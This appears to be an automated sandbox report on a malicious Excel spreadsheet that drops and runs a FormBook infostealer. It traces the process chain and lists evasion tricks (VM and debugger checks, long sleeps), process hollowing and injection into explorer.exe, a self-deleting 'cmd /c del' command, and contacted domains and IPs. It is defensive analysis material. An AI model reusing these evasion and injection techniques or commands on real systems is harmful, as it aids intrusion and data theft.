Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$(RFQ) No.109050.xlsx

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREE15.tmp

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/19@5/5

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Binary contains paths to development resources

Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

.NET source code contains calls to encryption/decryption functions

Source: vbc[1].exe.4.dr, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: vbc.exe.4.dr, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: RAServer.pdb^ source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, raserver.exe
Source:	Binary string: RAServer.pdb source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Source: vbc[1].exe.4.dr, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.4.dr, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs	.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_001D950F push edi; iretd		6_2_001D9510
Source: C:\Users\Public\vbc.exe	Code function: 7_2_004070F2 push CB9B4C56h; iretd		7_2_004070F7
Source: C:\Users\Public\vbc.exe	Code function: 7_2_004158FC pushfd ; retf		7_2_004158FF
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B3F2 push eax; ret		7_2_0041B3F8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B3FB push eax; ret		7_2_0041B462
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B3A5 push eax; ret		7_2_0041B3F8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B45C push eax; ret		7_2_0041B462
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00415436 pushad ; retf		7_2_00415437
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00415CBF push ds; iretd		7_2_00415CC4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A4DFA1 push ecx; ret		7_2_00A4DFB4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EEDFA1 push ecx; ret		9_2_01EEDFB4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_000958FC pushfd ; retf		9_2_000958FF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_000870F2 push CB9B4C56h; iretd		9_2_000870F7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_0009B3A5 push eax; ret		9_2_0009B3F8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_0009B3FB push eax; ret		9_2_0009B462
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_0009B3F2 push eax; ret		9_2_0009B3F8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00095436 pushad ; retf		9_2_00095437
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_0009B45C push eax; ret		9_2_0009B462
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00095CBF push ds; iretd		9_2_00095CC4

Binary contains a suspicious time stamp

Source: vbc[1].exe.4.dr

Static PE information: 0x9EDDC985 [Wed Jun 17 18:52:53 2054 UTC]

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: .text entropy: 7.15286878392
Source: initial sample	Static PE information: section name: .text entropy: 7.15286878392

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2028, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2852	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3036	Thread sleep time: -39025s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2964	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe TID: 2012	Thread sleep time: -32000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\raserver.exe	Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 7_2_004088A0 rdtsc

7_2_004088A0

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Queries a list of all running processes

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Contains medium sleeps (>= 30s)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 39025			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.484440304.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000008.00000000.491890159.000000000449C000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0P
Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000008.00000000.484440304.000000000457A000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000008.00000000.539206634.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000008.00000000.492529993.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 7_2_004088A0 rdtsc

7_2_004088A0

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A526F8 mov eax, dword ptr fs:[00000030h]		7_2_00A526F8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_01EF26F8 mov eax, dword ptr fs:[00000030h]		9_2_01EF26F8

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 7_2_00409B10 LdrLoadDll,

7_2_00409B10

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.corpmat.com
Source: C:\Windows\explorer.exe	Network Connect: 34.98.99.30 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 144.217.61.66 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.boxtobookshelf.com
Source: C:\Windows\explorer.exe	Domain query: www.hansel-design.com
Source: C:\Windows\explorer.exe	Domain query: www.aubergetoitrouge.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 75.2.89.208 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.afishin.com

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 7C0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Thread register set: target process: 1764			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY